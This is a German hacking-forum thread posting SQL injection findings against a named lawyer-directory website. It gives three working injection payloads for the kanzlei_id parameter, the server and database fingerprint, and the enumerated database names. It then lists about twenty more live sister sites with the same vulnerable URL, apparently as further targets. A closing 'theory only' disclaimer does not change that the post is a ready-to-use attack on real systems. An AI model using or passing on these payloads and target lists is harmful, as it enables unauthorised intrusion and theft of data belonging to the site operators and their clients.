Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[SQLi] advocat24.de und Others

- - - - -

  • Bitte melde dich an um zu Antworten
Keine Antworten in diesem Thema

#1
Ch!ller

Ch!ller

    Shinigami

  • SubMod
  • PIPPIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    955
  • 896 Beiträge
  • 1384 Bedankt
  • Spender
  • verifiziert

http://www.advocat24.de/ger/anwaelte/vkarte.php?kanzlei_id=330

Parameter: kanzlei_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: kanzlei_id=330 AND 3509=3509

    Type: UNION query
    Title: MySQL UNION query (NULL) - 24 columns
    Payload: kanzlei_id=330 UNION ALL SELECT NULL,NULL,CONCAT(0x7178767071,0x46756f646f4563595359,0x71716a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: kanzlei_id=330 AND 1802=BENCHMARK(5000000,MD5(0x75705a59))
---
web server operating system: Linux SuSE 10.0
web application technology: PHP 4.4.0, Apache 2.0.54
back-end DBMS: MySQL < 5.0.0
available databases [5]:
[*] advocat24
[*] phpmyadmin
[*] postleitzahl
[*] test
[*] test\\_%

 

http://www.advocat24.de/eng/anwaelte/vkarte.php?kanzlei_id=61
http://www.erbschaft-advocat24.de/ger/anwaelte/vkarte.php?kanzlei_id=254
http://www.taxgrex24.de/ger/anwaelte/vkarte.php?kanzlei_id=238
http://www.anwaltsverzeichnis24.de/ger/anwaelte/vkarte.php?kanzlei_id=295
http://www.notare24.de/eng/anwaelte/vkarte.php?kanzlei_id=126
http://notare24.de/ger/anwaelte/vkarte.php?kanzlei_id=304
http://www.rechtsanwaltsnotruf.de/ger/anwaelte/vkarte.php?kanzlei_id=298
http://www.grexpert24.de/ger/anwaelte/vkarte.php?kanzlei_id=126
http://www.anwalt-anwaelte-rechtsanwalt-rechtsanwaelte.de/ger/anwaelte/vkarte.php?kanzlei_id=301
http://gutachter24.de/ger/anwaelte/vkarte_add.php?kanzlei_id=300
http://www.rechtsanwaltsverzeichnis24.de/ger/notare/vkarte_add.php?kanzlei_id=41
http://www.rechtsvertreter24.de/eng/anwaelte/vkarte.php?kanzlei_id=145
http://www.testament-advocat24.de/ger/anwaelte/vkarte.php?kanzlei_id=316
http://rechts-nachrichten.de/ger/anwaelte/vkarte_add.php?kanzlei_id=143
http://www.anwalts-liste.de/ger/anwaelte/vkarte_add.php?kanzlei_id=168
http://rechtsanwalt-liste.de/ger/anwaelte/vkarte_add.php?kanzlei_id=55
http://www.anwalts-suchdienst24.de/ger/notare/vkarte_add.php?kanzlei_id=54
http://anwalt-hotline24.de/ger/anwaelte/vkarte.php?kanzlei_id=21
http://www.anwaelte-advocaten-advokaten-rechtsanwaelte.de/ger/anwaelte/vkarte_add.php?kanzlei_id=234
http://anwaelte-advocaten-advokaten-rechtsanwaelte.de/ger/notare/vkarte_add.php?kanzlei_id=32
http://www.german-barristers.de/eng/anwaelte/vkarte.php?kanzlei_id=103
http://www.german-attornies.de/ger/anwaelte/vkarte.php?kanzlei_id=181

Alle Angaben und Informationen dienen lediglich der Theorie!



  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


Dieses Thema wurde von 71 Mitglied(ern) gelesen


    , , <cerrno>, 2242, 3xploit, Alsuna, Amphe1337, Avni, B1nary, Backdoored, Benutzer, BlackZetsu, blue_eyed_devil, Bojka, Ch!ller, chick0n, clusterhead, cooky1, Cranky, Crap, Cube, CyberFlash, D3r0ma, DarkICE, easysurfer, Erikson, eXalT, Framerater, frechdax, Freshness28, gutzuu, Injection, Irhabi, izibitzi, kalixa, keyb0ardz, len0, lNobodyl, loginman1, MarkSantos, matad0r, mdwd, Meikyo, mister-miyagi, most_uniQue, mrv, Mugluge, nninja, NoNameMT, notfound, pekelhc, Pentoman, Platin, R3s1stanc3, redflag, Replacement, romka1337, SAR, sissler, Slixer, thanh109, the.3nd, Toolbase, ueEqlL, vôl, weedneger77, whitehawk, Xenio, xFAUSTx, xVirtu, ZechenKind
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.